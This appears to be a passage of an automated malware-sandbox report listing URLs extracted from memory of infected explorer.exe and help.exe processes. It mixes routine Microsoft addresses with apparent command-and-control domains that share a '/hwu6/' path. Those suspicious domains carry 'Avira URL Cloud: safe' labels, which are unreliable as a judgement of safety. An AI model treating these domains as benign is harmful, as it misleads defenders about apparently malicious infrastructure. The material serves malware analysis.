                                                https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-explorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameriexplorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.7b5846.onlineReferer:explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.91uvq.pro/hwu6/explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.91uvq.pro/hwu6/www.maheshg.xyzexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.moocatinght.top/hwu6/www.suv-deals-49508.bondexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.piedmontcsb.infoexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.86339.xyzexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.vibrantsoul.xyzexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.hair-transplantation-65829.bond/hwu6/www.gequiltdesins.shopexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.moocatinght.top/hwu6/explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.maheshg.xyz/hwu6/explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.ilsgroup.netReferer:explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.health-insurance-cake.worldexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://wns.windows.com/eexplorer.exe, 00000003.00000003.2979322118.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2348802491.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4776588202.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.ozzd86fih4.online/hwu6/www.piedmontcsb.infoexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000003.2980563020.000000000C3C4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2351958536.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2979678355.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980460373.000000000C35C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980802198.000000000C40D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.hair-transplantation-65829.bond/hwu6/explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.ozzd86fih4.onlineReferer:explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.86339.xyz/hwu6/explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&ocexplorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.gequiltdesins.shop/hwu6/explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-explorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.maheshg.xyz/hwu6/www.hair-transplantation-65829.bondexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://www.d66dr114gl.bond/hwu6/explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://android.notify.windows.com/iOSexplorer.exe, 00000003.00000002.4780167257.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2351958536.000000000BFDF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.simo1simo001.click/hwu6/explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://outlook.comeexplorer.exe, 00000003.00000003.2981042434.000000000C08A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4780334322.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980858882.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2351958536.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.86339.xyz/hwu6/www.d66dr114gl.bondexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000003.00000003.2979322118.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2348802491.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4776588202.00000000099AB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.simo1simo001.click/hwu6/www.ilsgroup.netexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.maheshg.xyzexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.d66dr114gl.bondReferer:explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.backstretch.storeexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.ilsgroup.net/hwu6/www.7b5846.onlineexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000003.00000002.4776588202.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2348289293.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.backstretch.storeReferer:explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://api.msn.com/Iexplorer.exe, 00000003.00000002.4776588202.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2348289293.000000000962B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.ozzd86fih4.online/hwu6/explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://www.health-insurance-cake.worldReferer:explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://www.91uvq.proexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://www.7b5846.online/hwu6/www.91uvq.proexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://www.86339.xyzReferer:explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://www.suv-deals-49508.bond/hwu6/explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://schemas.microexplorer.exe, 00000003.00000002.4775355459.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4775380521.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.4770959078.00000000028A0000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.health-insurance-cake.world/hwu6/www.vibrantsoul.xyzexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.ozzd86fih4.onlineexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.gequiltdesins.shop/hwu6/www.backstretch.storeexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.health-insurance-cake.world/hwu6/explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://301.gn301.com:4500/?u=explorer.exe, 00000003.00000002.4782465999.000000001111F000.00000004.80000000.00040000.00000000.sdmp, help.exe, 00000005.00000002.4771639384.0000000003EFF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.moocatinght.topReferer:explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.d66dr114gl.bond/hwu6/www.ozzd86fih4.onlineexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://www.hair-transplantation-65829.bondReferer:explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-hexplorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-quexplorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.ilsgroup.netexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.suv-deals-49508.bondexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.91uvq.proReferer:explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.simo1simo001.clickexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.vibrantsoul.xyz/hwu6/explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhzexplorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://excel.office.com-explorer.exe, 00000003.00000003.2981042434.000000000C08A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4780334322.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980858882.000000000C048000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2351958536.000000000C048000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.7b5846.onlineexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.hair-transplantation-65829.bondexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.vibrantsoul.xyz/hwu6/www.86339.xyzexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgexplorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.gequiltdesins.shopReferer:explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-darkexplorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AAexplorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.gequiltdesins.shopexplorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                http://www.suv-deals-49508.bondReferer:explorer.exe, 00000003.00000003.3075026683.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4781646021.000000000C49D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2980349840.000000000C496000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-cexplorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reveexplorer.exe, 00000003.00000000.2345552654.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4774163820.00000000073E5000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		high
